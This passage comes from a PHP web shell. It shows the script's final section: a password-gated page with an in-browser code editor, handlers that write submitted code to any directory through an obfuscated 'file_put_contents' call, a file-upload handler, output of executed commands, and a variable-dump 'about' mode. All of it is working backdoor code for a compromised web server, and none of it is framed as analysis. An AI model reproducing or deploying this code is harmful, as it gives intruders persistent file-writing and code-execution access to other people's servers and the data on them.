</form></th>
</tr>
</table>
<script>
var myCodeMirror = CodeMirror.fromTextArea(document.getElementById('codemirror'), {
theme: 'monokai',
lineNumbers: true,
matchBrackets: true,
mode: 'javascript',
viewportMargin: false,
});
function full(){
myCodeMirror.setSize('100%', '100%');
}
function fullN(){
myCodeMirror.setSize('100%', '60%');
}
function reset() {
var txt;
if (confirm('Ar u sure wanna reset d code?')) {
myCodeMirror.setValue('');
}
}
</script>
";
echo "<center><hr style='border-top: 1px solid #dfe4ea' width='90%'><h4>";
if(isset($_POST['savesubmit'])){
if(!chdir($saveto)){
die("<mark style='background: #ffffff'><a style='color:#ff4757'> directory not exist -> $saveto");
};
$fpc = 'file_p' . 'ut_contents';
$write = $fpc($file, $_POST['code']);
if($write) {
die("<mark style='background: #ffffff'><a style='color:#2ed573'> saved -> $file");
} else {
die("<mark style='background: #ffffff'><a style='color:#ff4757'> failed save -> $file");
}
} elseif(isset($_POST['uploadsubmit'])){
if(!chdir($uplto)){
die("<mark style='background: #ffffff'><a style='color:#ff4757'> directory not exist -> $uplto");
};
$uploadname = $_FILES['datupload']['name'];
$uploadtmp = $_FILES['datupload']['tmp_name'];
$write = copy($uploadtmp, $uploadname);
if($write) {
die("<mark style='background: #ffffff'><a style='color:#2ed573'> uploaded -> $uploadname");
} else {
die("<mark style='background: #ffffff'><a style='color:#ff4757'> failed upload -> $uploadname");
}
} elseif($tmp_run){
die("$tmp_run");
};
// mode about
} elseif ($mode == "about") {
echo '</center><pre style="background:#dfe4ea; color: #2f3542; border-right: 6px solid #ced6e0;"><i>var_dump($w);</i><br>';
echo var_dump($w);
} else {
echo "<img src='$img'><br>what ar u doin?<br>dont forget to open <b>console.log<b><br><br><a style='font-size:10; color:#ff4757' href='?$param=$pass&mode=iframe'>[Go to iframe mode]</a>
<noscript><i>javascript isn't running</i></noscript><script>
if(!navigator.onLine) {
alert('u must connect internet for best experience');
}
</script>";
};